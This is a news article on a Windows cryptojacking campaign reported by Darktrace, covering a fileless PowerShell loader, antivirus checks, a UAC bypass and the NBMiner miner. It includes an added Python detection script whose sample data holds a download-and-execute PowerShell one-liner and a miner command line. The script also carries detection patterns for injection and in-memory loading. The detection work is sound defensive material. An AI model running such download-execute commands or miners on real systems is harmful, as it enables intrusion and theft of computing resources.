Cybersecurity company Darktrace has identified a new cryptojacking campaign designed to evade Windows Defender and deploy cryptocurrency mining software.
Summary
- Darktrace has identified a cryptojacking campaign targeting Windows systems.
- The campaign secretly deploys NBMiner to mine cryptocurrency on infected machines.
The cryptojacking campaign, first identified in late July, uses a multi-stage infection chain that quietly hijacks the processing power of infected computers to mine cryptocurrency.
Researchers say the campaign targets Windows systems by leveraging PowerShell, Microsoft's built-in command-line shell and scripting language.
The malicious scripts are designed to run directly in system memory (RAM) without being written to disk, so traditional antivirus tools that rely on scanning files on the hard drive may never see them. Fileless does not mean invisible, however: PowerShell script block logging (Event ID 4104) and the Antimalware Scan Interface (AMSI) both see the decoded script text at execution time, which is where detection should start.
The attacker then uses a Windows automation scripting language, a tool IT professionals normally use to automate routine tasks, to inject malicious loaders into legitimate Windows processes and to download and run cryptocurrency mining software without leaving obvious traces on the system.
As an additional line of defence, the loader performs a series of environment checks before doing anything else: it looks for signs of a sandbox or analysis environment and enumerates the antivirus products installed on the host.
According to Darktrace, the loader proceeds only if Windows Defender is the sole active protection; if any other security product is present, it does not run. If the infected user account lacks administrative privileges, the loader also attempts to bypass User Account Control (UAC) to gain elevated access.
Once these conditions are met, the program downloads and runs NBMiner, a well-known mining tool that uses the computer's graphics processing unit (GPU) to mine cryptocurrencies such as Ravencoin (RVN) and Monero (XMR).
In this case, Darktrace said: “we were able to use an autonomous response system to contain the attack by preventing devices from making outbound connections and blocking certain connections to suspicious endpoints.”
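As an added example (not code from Darktrace or from this article), the following Python script shows what detection of this chain looks like when run over constructed log lines: it scores PowerShell script-block text for the download-and-execute-in-memory pattern, scores process-creation events for NBMiner-style command lines and for system-binary names launched from user-writable paths, and extracts the stratum pool endpoints so egress to them can be blocked, which is the containment step quoted above. Host names, IP addresses, the wallet string and the indicator weights are assumptions chosen for the example.

```python
"""Triage logic for the in-memory PowerShell loader and NBMiner stages described
above, run over constructed log lines. Added example; not Darktrace's code."""
import re
from typing import Dict, List, Tuple

# Indicators for the fileless PowerShell stage. Script block logging (Event ID
# 4104) records decoded script text, so "runs only in RAM" is still observable.
SCRIPT_BLOCK_INDICATORS = {
    "download-to-memory": re.compile(r"DownloadString|DownloadData|Invoke-WebRequest|\biwr\b", re.I),
    "invoke-expression": re.compile(r"\bIEX\b|Invoke-Expression", re.I),
    "base64-payload": re.compile(r"FromBase64String|-enc(odedcommand)?\b", re.I),
    "reflective-load": re.compile(r"Reflection\.Assembly\]::Load\b", re.I),
    "injection-api": re.compile(r"VirtualAlloc(Ex)?|WriteProcessMemory|CreateRemoteThread|NtMapViewOfSection", re.I),
}

# Indicators for the miner stage: a stratum pool URL, NBMiner-style -a/-u flags,
# and a system-binary name started from a user-writable directory.
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://([A-Za-z0-9.\-]+):(\d+)", re.I)
MINER_ALGO_RE = re.compile(r"(?:^|\s)-a\s+(?:kawpow|randomx|ethash|etchash|autolykos|octopus)\b", re.I)
WALLET_FLAG_RE = re.compile(r"(?:^|\s)-u\s+\S+")
USER_WRITABLE_RE = re.compile(r"\\(Users|ProgramData|Temp)\\", re.I)
SYSTEM_NAMES = {"svchost.exe", "explorer.exe", "conhost.exe", "dllhost.exe", "rundll32.exe"}
# Assumed weights; tune against your own telemetry.
PROCESS_WEIGHTS = {"stratum-pool-url": 4, "miner-algorithm-flag": 2,
                   "wallet-argument": 1, "system-name-in-user-path": 3}

# Constructed sample events (not real telemetry). Hosts, IPs (TEST-NET ranges)
# and the wallet string are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "script_block", "host": "WS-042",
     "text": "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2.ps1')"},
    {"type": "script_block", "host": "WS-042",
     "text": "$b=[Convert]::FromBase64String($p);[System.Reflection.Assembly]::Load($b)"},
    {"type": "process", "host": "WS-042", "image": r"C:\Users\Public\svchost.exe",
     "cmdline": r"C:\Users\Public\svchost.exe -a kawpow -o stratum+tcp://203.0.113.55:3333 -u RVNWALLETPLACEHOLDER.ws042 -p x"},
    {"type": "process", "host": "WS-017", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
    {"type": "script_block", "host": "WS-017",
     "text": r"Get-ChildItem C:\Logs | Where-Object Length -gt 1MB"},
]


def score_script_block(text: str) -> Tuple[int, List[str]]:
    """Two points per indicator: a single hit is common in admin scripts,
    two or more together is the download-then-execute-in-RAM shape."""
    hits = [name for name, rx in SCRIPT_BLOCK_INDICATORS.items() if rx.search(text)]
    return len(hits) * 2, hits


def score_process(image: str, cmdline: str) -> Tuple[int, List[str]]:
    """Weighted indicators for a process-creation record (Sysmon 1 / Security 4688)."""
    hits: List[str] = []
    has_pool = bool(STRATUM_RE.search(cmdline))
    if has_pool:
        hits.append("stratum-pool-url")
    if MINER_ALGO_RE.search(cmdline):
        hits.append("miner-algorithm-flag")
    # A bare -u is too generic on its own; only count it next to a pool URL.
    if has_pool and WALLET_FLAG_RE.search(cmdline):
        hits.append("wallet-argument")
    name = image.rsplit("\\", 1)[-1].lower()
    if name in SYSTEM_NAMES and USER_WRITABLE_RE.search(image):
        hits.append("system-name-in-user-path")
    return sum(PROCESS_WEIGHTS[h] for h in hits), hits


def triage(events: List[Dict[str, str]], threshold: int = 4) -> List[Dict]:
    """Return the events whose score reaches the threshold, with their indicators."""
    findings = []
    for ev in events:
        if ev["type"] == "script_block":
            score, hits = score_script_block(ev["text"])
        elif ev["type"] == "process":
            score, hits = score_process(ev["image"], ev["cmdline"])
        else:
            continue
        if score >= threshold:
            findings.append({"host": ev["host"], "score": score, "indicators": hits, "event": ev})
    return findings


def pool_endpoints(findings: List[Dict]) -> List[Tuple[str, int]]:
    """Collect pool host:port pairs from flagged miner command lines so an egress
    control (firewall, proxy, or an autonomous response tool) can block them."""
    endpoints = set()
    for f in findings:
        ev = f["event"]
        if ev["type"] == "process":
            for host, port in STRATUM_RE.findall(ev["cmdline"]):
                endpoints.add((host, int(port)))
    return sorted(endpoints)


if __name__ == "__main__":
    flagged = triage(SAMPLE_EVENTS)
    for f in flagged:
        print(f["host"], f["score"], f["indicators"])
    print("block egress to:", pool_endpoints(flagged))
```

Run as-is, the script flags the three WS-042 events and lists the one pool endpoint to block; the legitimate svchost.exe and the benign admin script score zero. In production the same scoring would be fed from the Microsoft-Windows-PowerShell/Operational log (Event ID 4104) and from Sysmon Event ID 1 or Windows Security Event ID 4688 process-creation records with command-line auditing enabled; the weights are a starting point, not a tuned model.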
“Cryptocurrencies are becoming increasingly popular, as seen in the continued high valuation of global cryptocurrencies (almost 4 trillion USD at the time of writing), so threat actors continue to see crypto as a beneficial venture,” wrote a Darktrace researcher.
In July, Darktrace flagged another campaign in which attackers used elaborate social engineering, posing as real companies, to trick users into downloading modified software that deploys cryptocurrency-targeting malware.
Unlike the cryptojacking scheme described above, that campaign targeted both Windows and macOS systems and relied on the unwitting victims themselves, who believed they were interacting with company insiders, to run the malware.